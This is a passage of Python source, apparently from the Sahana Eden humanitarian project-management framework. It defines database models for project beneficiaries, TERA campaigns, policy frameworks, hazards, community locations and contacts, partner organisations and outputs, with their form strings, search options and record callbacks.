tablename = "project_beneficiary_activity"
table = define_table(tablename,
self.project_activity_id(),
beneficiary_id(),
#s3_comments(),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_beneficiary_represent(id, row=None):
"""
FK representation
@ToDo: Bulk
"""
if row:
return row.type
if not id:
return current.messages["NONE"]
db = current.db
table = db.project_beneficiary
ttable = db.project_beneficiary_type
query = (table.id == id) & \
(table.parameter_id == ttable.id)
r = db(query).select(table.value,
ttable.name,
limitby = (0, 1)).first()
try:
return "%s %s" % (r["project_beneficiary.value"],
r["project_beneficiary_type.name"])
except:
return current.messages.UNKNOWN_OPT
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_onaccept(form):
"""
Update project_beneficiary project & location from project_location_id
"""
db = current.db
btable = db.project_beneficiary
ltable = db.project_location
record_id = form.vars.id
query = (btable.id == record_id) & \
(ltable.id == btable.project_location_id)
project_location = db(query).select(ltable.project_id,
ltable.location_id,
limitby=(0, 1)).first()
if project_location:
db(btable.id == record_id).update(
project_id = project_location.project_id,
location_id = project_location.location_id
)
return
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_beneficiary":
return
data = item.data
if "parameter_id" in data and \
"project_location_id" in data:
# Match beneficiary by type and project_location
table = item.table
parameter_id = data.parameter_id
project_location_id = data.project_location_id
query = (table.parameter_id == parameter_id) & \
(table.project_location_id == project_location_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_year(row):
""" Virtual field for the project_beneficiary table """
if hasattr(row, "project_beneficiary"):
row = row.project_beneficiary
try:
project_id = row.project_id
except AttributeError:
return []
try:
date = row.date
except AttributeError:
date = None
try:
end_date = row.end_date
except AttributeError:
end_date = None
if not date or not end_date:
table = current.s3db.project_project
project = current.db(table.id == project_id) \
.select(table.start_date,
table.end_date,
limitby=(0, 1)).first()
if project:
if not date:
date = project.start_date
if not end_date:
end_date = project.end_date
if not date and not end_date:
return []
elif not end_date:
return [date.year]
elif not date:
return [end_date.year]
else:
return list(xrange(date.year, end_date.year + 1))
# =============================================================================
class S3ProjectCampaignModel(S3Model):
"""
Project Campaign Model
- used for TERA integration:
http://www.ifrc.org/en/what-we-do/beneficiary-communications/tera/
- depends on Stats module
"""
names = ["project_campaign",
"project_campaign_message",
"project_campaign_keyword",
#"project_campaign_response",
"project_campaign_response_summary",
]
def model(self):
if not current.deployment_settings.has_module("stats"):
# Campaigns Model needs Stats module enabling
return dict()
T = current.T
db = current.db
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
location_id = self.gis_location_id
# ---------------------------------------------------------------------
# Project Campaign
#
tablename = "project_campaign"
table = define_table(tablename,
#self.project_project_id(),
Field("name", length=128, #unique=True,
#requires = IS_NOT_IN_DB(db,
# "project_campaign.name")
),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN = T("Add Campaign")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN,
title_display = T("Campaign"),
title_list = T("Campaigns"),
title_update = T("Edit Campaign"),
title_search = T("Search Campaigns"),
subtitle_create = T("Add New Campaign"),
label_list_button = T("List Campaigns"),
label_create_button = ADD_CAMPAIGN,
msg_record_created = T("Campaign Added"),
msg_record_modified = T("Campaign Updated"),
msg_record_deleted = T("Campaign Deleted"),
msg_list_empty = T("No Campaigns Found")
)
# Reusable Field
represent = S3Represent(lookup=tablename)
campaign_id = S3ReusableField("campaign_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_campaign.id",
represent,
sort=True)),
represent = represent,
label = T("Campaign"),
comment = S3AddResourceLink(c="project",
f="campaign",
title=ADD_CAMPAIGN,
tooltip=\
T("If you don't see the campaign in the list, you can add a new one by clicking link 'Add Campaign'.")),
ondelete = "CASCADE")
add_component("project_campaign_message",
project_campaign="campaign_id")
# ---------------------------------------------------------------------
# Project Campaign Message
# - a Message to broadcast to a geographic location (Polygon)
#
tablename = "project_campaign_message"
table = define_table(tablename,
campaign_id(),
Field("name", length=128, #unique=True,
#requires = IS_NOT_IN_DB(db,
# "project_campaign.name")
),
s3_comments("message",
label = T("Message")),
location_id(
widget = S3LocationSelectorWidget(
catalog_layers=True,
polygon=True
)
),
# @ToDo: Allow selection of which channel message should be sent out on
#self.msg_channel_id(),
# @ToDo: Record the Message sent out
#self.msg_message_id(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN = T("Add Campaign")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN,
title_display = T("Campaign"),
title_list = T("Campaigns"),
title_update = T("Edit Campaign"),
title_search = T("Search Campaigns"),
subtitle_create = T("Add New Campaign"),
label_list_button = T("List Campaigns"),
label_create_button = ADD_CAMPAIGN,
msg_record_created = T("Campaign Added"),
msg_record_modified = T("Campaign Updated"),
msg_record_deleted = T("Campaign Deleted"),
msg_list_empty = T("No Campaigns Found")
)
# Reusable Field
represent = S3Represent(lookup=tablename)
message_id = S3ReusableField("campaign_message_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_campaign_message.id",
represent,
sort=True)),
represent = represent,
label = T("Campaign Message"),
ondelete = "CASCADE")
#add_component("project_campaign_response",
# project_campaign_message="campaign_message_id")
add_component("project_campaign_response_summary",
project_campaign_message="campaign_message_id")
# ---------------------------------------------------------------------
# Project Campaign Keyword
# - keywords in responses which are used in Stats reporting
#
tablename = "project_campaign_keyword"
table = define_table(tablename,
super_link("parameter_id", "stats_parameter"),
Field("name", length=128, unique=True,
requires = IS_NOT_IN_DB(db,
"project_campaign_keyword.name")),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN_KW = T("Add Keyword")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN_KW,
title_display = T("Keyword"),
title_list = T("Keywords"),
title_update = T("Edit Keyword"),
title_search = T("Search Keywords"),
subtitle_create = T("Add New Keyword"),
label_list_button = T("List Keywords"),
label_create_button = ADD_CAMPAIGN_KW,
msg_record_created = T("Keyword Added"),
msg_record_modified = T("Keyword Updated"),
msg_record_deleted = T("Keyword Deleted"),
msg_list_empty = T("No Keywords Found")
)
# Resource Configuration
configure(tablename,
super_entity = "stats_parameter",
)
# ---------------------------------------------------------------------
# Project Campaign Response
# - individual response (unused for TERA)
# - this can be populated by parsing raw responses
# - these are aggregated into project_campaign_response_summary
#
#tablename = "project_campaign_response"
#table = define_table(tablename,
# message_id(),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
# super_link("parameter_id", "stats_parameter",
# label = T("Keyword"),
# instance_types = ["project_campaign_keyword"],
# represent = S3Represent(lookup="stats_parameter"),
# readable = True,
# writable = True,
# empty = False,
# ),
# Getting this without TERA may be hard!
#location_id(writable = False),
# @ToDo: Link to the raw Message received
#self.msg_message_id(),
# s3_datetime(),
# s3_comments(),
# *s3_meta_fields())
# CRUD Strings
#ADD_CAMPAIGN_RESP = T("Add Response")
#crud_strings[tablename] = Storage(
# title_create = ADD_CAMPAIGN_RESP,
# title_display = T("Response Details"),
# title_list = T("Responses"),
# title_update = T("Edit Response"),
# title_search = T("Search Responses"),
# title_report = T("Response Report"),
# subtitle_create = T("Add New Response"),
# label_list_button = T("List Responses"),
# label_create_button = ADD_CAMPAIGN_RESP,
# msg_record_created = T("Response Added"),
# msg_record_modified = T("Response Updated"),
# msg_record_deleted = T("Response Deleted"),
# msg_list_empty = T("No Responses Found")
#)
# ---------------------------------------------------------------------
# Project Campaign Response Summary
# - aggregated responses (by Keyword/Location)
# - TERA data comes in here
#
tablename = "project_campaign_response_summary"
table = define_table(tablename,
message_id(),
# Instance
super_link("data_id", "stats_data"),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("parameter_id", "stats_parameter",
label = T("Keyword"),
instance_types = ["project_campaign_keyword"],
represent = S3Represent(lookup="stats_parameter"),
readable = True,
writable = True,
empty = False,
),
# Populated automatically (by TERA)
# & will be a msg_basestation?
location_id(writable = False),
Field("value", "integer",
label = T("Number of Responses"),
requires = IS_INT_IN_RANGE(0, 99999999),
represent = lambda v: \
IS_INT_AMOUNT.represent(v)),
# @ToDo: Populate automatically from time Message is sent?
s3_date("date",
label = T("Start Date"),
#empty = False,
),
s3_date("end_date",
label = T("End Date"),
#empty = False,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN_RESP_SUMM = T("Add Response Summary")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN_RESP_SUMM,
title_display = T("Response Summary Details"),
title_list = T("Response Summaries"),
title_update = T("Edit Response Summary"),
title_search = T("Search Response Summaries"),
title_report = T("Response Summary Report"),
subtitle_create = T("Add New Response Summary"),
label_list_button = T("List Response Summaries"),
label_create_button = ADD_CAMPAIGN_RESP_SUMM,
msg_record_created = T("Response Summary Added"),
msg_record_modified = T("Response Summary Updated"),
msg_record_deleted = T("Response Summary Deleted"),
msg_list_empty = T("No Response Summaries Found")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectFrameworkModel(S3Model):
"""
Project Framework Model
"""
names = ["project_framework",
"project_framework_organisation",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
messages = current.messages
ORGANISATION = messages.ORGANISATION
ORGANISATIONS = T("Organization(s)")
# ---------------------------------------------------------------------
# Project Frameworks
#
tablename = "project_framework"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
Field("name",
length=255,
unique=True,
label = T("Name"),
),
s3_comments("description",
label = T("Description"),
comment=None,
),
Field("time_frame",
represent = lambda v: v or messages.NONE,
label = T("Time Frame"),
),
*s3_meta_fields())
# CRUD Strings
if current.deployment_settings.get_auth_record_approval():
msg_record_created = T("Policy or Strategy added, awaiting administrator's approval")
else:
msg_record_created = T("Policy or Strategy added")
crud_strings[tablename] = Storage(
title_create = T("Add Policy or Strategy"),
title_display = T("Policy or Strategy"),
title_list = T("Policies & Strategies"),
title_update = T("Edit Policy or Strategy"),
title_search = T("Search Policies & Strategies"),
title_upload = T("Import Policies & Strategies"),
subtitle_create = T("Add New Policy or Strategy"),
label_list_button = T("List Policies & Strategies"),
label_create_button = T("Add Policy or Strategy"),
msg_record_created = msg_record_created,
msg_record_modified = T("Policy or Strategy updated"),
msg_record_deleted = T("Policy or Strategy deleted"),
msg_list_empty = T("No Policies or Strategies found")
)
crud_form = S3SQLCustomForm(
"name",
S3SQLInlineComponent(
"framework_organisation",
label = ORGANISATIONS,
fields = ["organisation_id"],
),
"description",
"time_frame",
S3SQLInlineComponent(
"document",
label = T("Files"),
fields = ["file"],
filterby = dict(field = "file",
options = "",
invert = True,
)
),
)
# search_method = S3Search(simple = S3SearchSimpleWidget(
# name = "project_framework_search_text",
# label = T("Name"),
# comment = T("Search for a Policy or Strategy by name or description."),
# field = ["name",
# "description",
# ]
# ))
self.configure(tablename,
super_entity="doc_entity",
crud_form = crud_form,
#search_method = search_method,
list_fields = ["name",
(ORGANISATIONS, "framework_organisation.organisation_id"),
"description",
"time_frame",
(T("Files"), "document.file"),
]
)
represent = S3Represent(lookup=tablename)
framework_id = S3ReusableField("framework_id", table,
label = ORGANISATION,
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_framework.id",
represent
)),
represent = represent,
ondelete = "CASCADE",
)
self.add_component("project_framework_organisation",
project_framework="framework_id")
# ---------------------------------------------------------------------
# Project Framework Organisations
#
tablename = "project_framework_organisation"
define_table(tablename,
framework_id(),
self.org_organisation_id(),
*s3_meta_fields()
)
# CRUD Strings
crud_strings[tablename] = Storage(
title_create = T("New Organization"),
title_display = ORGANISATION,
title_list = T("Organizations"),
title_update = T("Edit Organization"),
title_search = T("Search Organizations"),
subtitle_create = T("Add New Organization"),
label_list_button = T("List Organizations"),
label_create_button = T("Add Organization"),
msg_record_created = T("Organization added to Policy/Strategy"),
msg_record_modified = T("Organization updated"),
msg_record_deleted = T("Organization removed from Policy/Strategy"),
msg_list_empty = T("No Organizations found for this Policy/Strategy")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectHazardModel(S3Model):
"""
Project Hazard Model
"""
names = ["project_hazard",
"project_hazard_project",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Hazard
#
tablename = "project_hazard"
table = define_table(tablename,
Field("name",
length=128,
notnull=True,
unique=True,
label=T("Name"),
represent=lambda v: T(v) if v is not None \
else NONE,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_HAZARD = T("Add Hazard")
crud_strings[tablename] = Storage(
title_create = ADD_HAZARD,
title_display = T("Hazard Details"),
title_list = T("Hazards"),
title_update = T("Edit Hazard"),
title_upload = T("Import Hazards"),
subtitle_create = T("Add New Hazard"),
label_list_button = T("List Hazards"),
label_create_button = ADD_HAZARD,
label_delete_button = T("Delete Hazard"),
msg_record_created = T("Hazard added"),
msg_record_modified = T("Hazard updated"),
msg_record_deleted = T("Hazard deleted"),
msg_list_empty = T("No Hazards currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
hazard_id = S3ReusableField("hazard_id", table,
sortby = "name",
label = T("Hazards"),
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_hazard.id",
represent,
sort=True)),
represent = represent,
ondelete = "CASCADE",
)
# Field settings for project_project.hazard field in friendly_string_from_field_query function
# - breaks Action Buttons, so moved to inside the fn which calls them
#table.id.represent = represent
#table.id.label = T("Hazard")
# ---------------------------------------------------------------------
# Projects <> Hazards Link Table
#
tablename = "project_hazard_project"
define_table(tablename,
hazard_id(),
self.project_project_id(),
*s3_meta_fields()
)
# CRUD Strings
crud_strings[tablename] = Storage(
title_create = T("New Hazard"),
title_display = T("Hazard"),
title_list = T("Hazards"),
title_update = T("Edit Hazard"),
title_search = T("Search Hazards"),
title_upload = T("Import Hazard data"),
subtitle_create = T("Add New Hazard"),
label_list_button = T("List Hazards"),
label_create_button = T("Add Hazard to Project"),
msg_record_created = T("Hazard added to Project"),
msg_record_modified = T("Hazard updated"),
msg_record_deleted = T("Hazard removed from Project"),
msg_list_empty = T("No Hazards found for this Project"))
self.configure(tablename,
deduplicate=self.project_hazard_project_deduplicate,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_hazard_project":
return
data = item.data
if "project_id" in data and \
"hazard_id" in data:
project_id = data.project_id
hazard_id = data.hazard_id
table = item.table
query = (table.project_id == project_id) & \
(table.hazard_id == hazard_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectLocationModel(S3Model):
"""
Project Location Model
- these can simply be ways to display a Project on the Map
or these can be 'Communities'
"""
names = ["project_location",
"project_location_id",
"project_location_contact",
"project_location_represent",
]
def model(self):
T = current.T
db = current.db
settings = current.deployment_settings
community = settings.get_project_community()
messages = current.messages
NONE = messages["NONE"]
COUNTRY = messages.COUNTRY
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Project Location ('Community')
#
tablename = "project_location"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
# Populated onaccept - used for map popups
Field("name",
writable=False),
self.project_project_id(),
self.gis_location_id(
widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION(),
represent = self.gis_LocationRepresent(sep=", "),
comment = S3AddResourceLink(c="gis",
f="location",
label = T("Add Location"),
title=T("Location"),
tooltip=T("Enter some characters to bring up a list of possible matches")),
),
# % breakdown by location
Field("percentage", "decimal(3,2)",
label = T("Percentage"),
default = 0,
requires = IS_DECIMAL_IN_RANGE(0, 1),
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
if community:
LOCATION = T("Community")
LOCATION_TOOLTIP = T("If you don't see the community in the list, you can add a new one by clicking link 'Add Community'.")
ADD_LOCATION = T("Add Community")
crud_strings[tablename] = Storage(
title_create = ADD_LOCATION,
title_display = T("Community Details"),
title_list = T("Communities"),
title_update = T("Edit Community Details"),
title_search = T("Search Communities"),
title_upload = T("Import Community Data"),
title_report = T("3W Report"),
title_map = T("Map of Communities"),
subtitle_create = T("Add New Community"),
label_list_button = T("List Communities"),
label_create_button = ADD_LOCATION,
msg_record_created = T("Community Added"),
msg_record_modified = T("Community Updated"),
msg_record_deleted = T("Community Deleted"),
msg_list_empty = T("No Communities Found")
)
else:
LOCATION = T("Location")
LOCATION_TOOLTIP = T("If you don't see the location in the list, you can add a new one by clicking link 'Add Location'.")
ADD_LOCATION = T("Add Location")
crud_strings[tablename] = Storage(
title_create = ADD_LOCATION,
title_display = T("Location Details"),
title_list = T("Locations"),
title_update = T("Edit Location Details"),
title_search = T("Search Location"),
title_upload = T("Import Location Data"),
title_report = T("3W Report"),
title_map = T("Map of Projects"),
subtitle_create = T("Add New Location"),
label_list_button = T("List Locations"),
label_create_button = ADD_LOCATION,
msg_record_created = T("Location Added"),
msg_record_modified = T("Location updated"),
msg_record_deleted = T("Location Deleted"),
msg_list_empty = T("No Locations Found")
)
# Search Method
if community:
simple = S3SearchSimpleWidget(
name = "project_location_search_text",
label = T("Name"),
comment = T("Search for a Project Community by name."),
field = ["location_id$L0",
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
#"location_id$L5",
]
)
else:
simple = S3SearchSimpleWidget(
name = "project_location_search_text",
label = T("Text"),
comment = T("Search for a Project by name, code, location, or description."),
field = ["location_id$L0",
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
#"location_id$L5",
"project_id$name",
"project_id$code",
"project_id$description",
]
)
advanced_search = [
simple,
# This is only suitable for deployments with a few projects
#S3SearchOptionsWidget(
# name = "project_location_search_project",
# label = T("Project"),
# field = "project_id",
# cols = 3
#),
S3SearchOptionsWidget(
name = "project_location_search_theme",
label = T("Theme"),
field = "project_id$theme_project.theme_id",
options = self.project_theme_opts,
cols = 1,
),
S3SearchOptionsWidget(
name = "project_location_search_L0",
field = "location_id$L0",
label = COUNTRY,
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L1",
field = "location_id$L1",
location_level = "L1",
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L2",
field = "location_id$L2",
location_level = "L2",
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L3",
field = "location_id$L3",
location_level = "L3",
cols = 3
)
]
if settings.get_project_sectors():
sectors = S3SearchOptionsWidget(
name = "project_location_search_sector",
label = T("Sector"),
field = "project_id$sector.name",
cols = 3
)
advanced_search.insert(1, sectors)
search_method = S3Search(
simple = (simple),
advanced = advanced_search,
)
# Resource Configuration
report_fields = [(COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
(messages.ORGANISATION, "project_id$organisation_id"),
(T("Project"), "project_id"),
(T("Activity Types"), "activity_type.activity_type_id"),
]
list_fields = ["location_id",
(COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
"project_id",
]
if settings.get_project_theme_percentages():
list_fields.append((T("Themes"), "project_id$theme_project.theme_id"))
else:
list_fields.append((T("Activity Types"), "activity_type.activity_type_id"))
list_fields.append("comments")
configure(tablename,
super_entity="doc_entity",
create_next=URL(c="project", f="location",
args=["[id]", "beneficiary"]),
deduplicate=self.project_location_deduplicate,
onaccept=self.project_location_onaccept,
search_method=search_method,
report_options=Storage(search = advanced_search,
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(rows="location.location_id$L1",
cols="location.project_id",
fact="activity_type.activity_type_id",
aggregate="list",
totals=True
)
),
list_fields = list_fields,
)
# Reusable Field
project_location_represent = project_LocationRepresent()
project_location_id = S3ReusableField("project_location_id", table,
requires = IS_NULL_OR(
IS_ONE_OF(db(current.auth.s3_accessible_query("update",
table)),
"project_location.id",
project_location_represent,
sort=True)),
represent = project_location_represent,
label = LOCATION,
comment = S3AddResourceLink(ADD_LOCATION,
c="project", f="location",
tooltip=LOCATION_TOOLTIP),
ondelete = "CASCADE"
)
# Components
# Activity Types
add_component("project_activity_type",
project_location=dict(
link="project_activity_type_location",
joinby="project_location_id",
key="activity_type_id",
actuate="hide"))
# Beneficiaries
add_component("project_beneficiary",
project_location="project_location_id")
# Contacts
add_component("pr_person",
project_location=dict(
name="contact",
link="project_location_contact",
joinby="project_location_id",
key="person_id",
actuate="hide",
autodelete=False))
# Distributions
add_component("supply_distribution",
project_location="project_location_id")
# Themes
add_component("project_theme",
project_location=dict(
link="project_theme_location",
joinby="project_location_id",
key="theme_id",
actuate="hide"))
# ---------------------------------------------------------------------
# Project Community Contact Person
#
tablename = "project_location_contact"
table = define_table(tablename,
project_location_id(),
self.pr_person_id(
widget=S3AddPersonWidget(controller="pr"),
requires=IS_ADD_PERSON_WIDGET(),
comment=None
),
*s3_meta_fields())
# CRUD Strings
ADD_CONTACT = T("Add Contact")
LIST_OF_CONTACTS = T("Community Contacts")
crud_strings[tablename] = Storage(
title_create = ADD_CONTACT,
title_display = T("Contact Details"),
title_list = T("Contacts"),
title_update = T("Edit Contact Details"),
title_search = T("Search Contacts"),
subtitle_create = T("Add New Contact"),
label_list_button = T("List Contacts"),
label_create_button = ADD_CONTACT,
msg_record_created = T("Contact Added"),
msg_record_modified = T("Contact Updated"),
msg_record_deleted = T("Contact Deleted"),
msg_list_empty = T("No Contacts Found"))
# Components
# Email
add_component("pr_contact",
project_location_contact=dict(
name="email",
link="pr_person",
joinby="id",
key="pe_id",
fkey="pe_id",
pkey="person_id",
filterby="contact_method",
filterfor=["EMAIL"],
))
# Mobile Phone
add_component("pr_contact",
project_location_contact=dict(
name="phone",
link="pr_person",
joinby="id",
key="pe_id",
fkey="pe_id",
pkey="person_id",
filterby="contact_method",
filterfor=["SMS"],
))
contact_search_method = S3Search(
advanced=(S3SearchSimpleWidget(
name = "location_contact_search_simple",
label = T("Name"),
comment = T("You can search by person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons."),
field = ["person_id$first_name",
"person_id$middle_name",
"person_id$last_name"
]
),
S3SearchOptionsWidget(
name="location_contact_search_L1",
field="project_location_id$location_id$L1",
location_level="L1",
cols = 3,
),
S3SearchOptionsWidget(
name="location_contact_search_L2",
field="project_location_id$location_id$L2",
location_level="L2",
cols = 3,
)
))
# Resource configuration
configure(tablename,
search_method=contact_search_method,
list_fields=["person_id",
(T("Email"), "email.value"),
(T("Mobile Phone"), "phone.value"),
"project_location_id",
(T("Project"), "project_location_id$project_id"),
])
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(project_location_id = project_location_id,
project_location_represent = project_location_represent,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_location_id = lambda **attr: dummy("project_location_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_location_onaccept(form):
"""
Calculate the 'name' field used by Map popups
"""
vars = form.vars
id = vars.id
if vars.location_id and vars.project_id:
name = current.s3db.project_location_represent(None, vars)
elif id:
name = current.s3db.project_location_represent(id)
else:
return None
if len(name) > 512:
# Ensure we don't break limits of SQL field
name = name[:509] + "..."
db = current.db
db(db.project_location.id == id).update(name=name)
# -------------------------------------------------------------------------
@staticmethod
def project_location_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_location":
return
data = item.data
if "project_id" in data and \
"location_id" in data:
project_id = data.project_id
location_id = data.location_id
table = item.table
query = (table.project_id == project_id) & \
(table.location_id == location_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectOrganisationModel(S3Model):
"""
Project Organisation Model
"""
names = ["project_organisation"]
def model(self):
T = current.T
messages = current.messages
NONE = messages["NONE"]
# ---------------------------------------------------------------------
# Project Organisations
# for multi_orgs=True
#
project_organisation_roles = current.deployment_settings.get_project_organisation_roles()
organisation_help = T("Add all organizations which are involved in different roles in this project")
tablename = "project_organisation"
table = self.define_table(tablename,
self.project_project_id(),
self.org_organisation_id(
requires = self.org_organisation_requires(
required=True,
# Need to be able to add Partners/Donors not just Lead org
#updateable=True,
),
widget = None,
comment=S3AddResourceLink(c="org",
f="organisation",
label=T("Add Organization"),
title=messages.ORGANISATION,
tooltip=organisation_help)
),
Field("role", "integer",
label = T("Role"),
requires = IS_NULL_OR(
IS_IN_SET(project_organisation_roles)
),
represent = lambda opt: \
project_organisation_roles.get(opt,
NONE)),
Field("amount", "double",
requires = IS_NULL_OR(
IS_FLOAT_AMOUNT()),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
widget = IS_FLOAT_AMOUNT.widget,
label = T("Funds Contributed")),
s3_currency(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_PROJECT_ORG = T("Add Organization to Project")
current.response.s3.crud_strings[tablename] = Storage(
title_create = ADD_PROJECT_ORG,
title_display = T("Project Organization Details"),
title_list = T("Project Organizations"),
title_update = T("Edit Project Organization"),
title_search = T("Search Project Organizations"),
title_upload = T("Import Project Organizations"),
title_report = T("Funding Report"),
subtitle_create = T("Add Organization to Project"),
label_list_button = T("List Project Organizations"),
label_create_button = ADD_PROJECT_ORG,
label_delete_button = T("Remove Organization from Project"),
msg_record_created = T("Organization added to Project"),
msg_record_modified = T("Project Organization updated"),
msg_record_deleted = T("Organization removed from Project"),
msg_list_empty = T("No Organizations for Project(s)"))
# Report Options
report_fields = ["project_id",
"organisation_id",
"role",
"amount",
"currency",
]
report_options = Storage(rows = report_fields,
cols = report_fields,
fact = report_fields,
#methods = ["sum"],
defaults = Storage(rows = "organisation.organisation_id",
cols = "organisation.currency",
fact = "organisation.amount",
aggregate = "sum",
totals = False
)
)
# Resource Configuration
self.configure(tablename,
report_options = report_options,
deduplicate=self.project_organisation_deduplicate,
onvalidation=self.project_organisation_onvalidation,
onaccept=self.project_organisation_onaccept,
ondelete=self.project_organisation_ondelete,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_onvalidation(form, lead_role=None):
""" Form validation """
if lead_role is None:
lead_role = current.deployment_settings.get_project_organisation_lead_role()
vars = form.vars
project_id = vars.project_id
organisation_id = vars.organisation_id
if str(vars.role) == str(lead_role) and project_id:
db = current.db
otable = db.project_organisation
query = (otable.deleted != True) & \
(otable.project_id == project_id) & \
(otable.role == lead_role) & \
(otable.organisation_id != organisation_id)
row = db(query).select(otable.id,
limitby=(0, 1)).first()
if row:
form.errors.role = \
current.T("Lead Implementer for this project is already set, please choose another role.")
return
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_onaccept(form):
"""
Record creation post-processing
If the added organisation is the lead role, set the
project.organisation to point to the same organisation
& update the realm_entity.
"""
vars = form.vars
if str(vars.role) == \
str(current.deployment_settings.get_project_organisation_lead_role()):
# Read the record
# (safer than relying on vars which might be missing on component tabs)
db = current.db
ltable = db.project_organisation
record = db(ltable.id == vars.id).select(ltable.project_id,
ltable.organisation_id,
limitby=(0, 1)
).first()
# Set the Project's organisation_id to the new lead organisation
organisation_id = record.organisation_id
ptable = db.project_project
db(ptable.id == record.project_id).update(
organisation_id = organisation_id,
realm_entity = \
current.s3db.pr_get_pe_id("org_organisation",
organisation_id)
)
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_ondelete(row):
"""
Executed when a project organisation record is deleted.
If the deleted organisation is the lead role on this project,
set the project organisation to None.
"""
db = current.db
potable = db.project_organisation
ptable = db.project_project
query = (potable.id == row.get("id"))
deleted_row = db(query).select(potable.deleted_fk,
potable.role,
limitby=(0, 1)).first()
if str(deleted_row.role) == \
str(current.deployment_settings.get_project_organisation_lead_role()):
# Get the project_id
deleted_fk = json.loads(deleted_row.deleted_fk)
project_id = deleted_fk["project_id"]
# Set the project organisation_id to NULL (using None)
db(ptable.id == project_id).update(organisation_id=None)
return
# ---------------------------------------------------------------------
@staticmethod
def project_organisation_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_organisation":
return
data = item.data
if "project_id" in data and \
"organisation_id" in data:
table = item.table
project_id = data.project_id
organisation_id = data.organisation_id
query = (table.project_id == project_id) & \
(table.organisation_id == organisation_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectOutputModel(S3Model):
"""
Project Output Model
"""
names = ["project_output"]
def model(self):
T = current.T
db = current.db
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Outputs
#
tablename = "project_output"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("name",
represent = lambda v: v or NONE,
label = T("Output")),
Field("status",
represent = lambda v: v or NONE,
label = T("Status")),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Output"),
title_display = T("Output"),
title_list = T("Outputs"),
title_update = T("Edit Output"),
subtitle_create = T("Add New Output"),
label_list_button = T("List Outputs"),
label_create_button = T("New Output"),
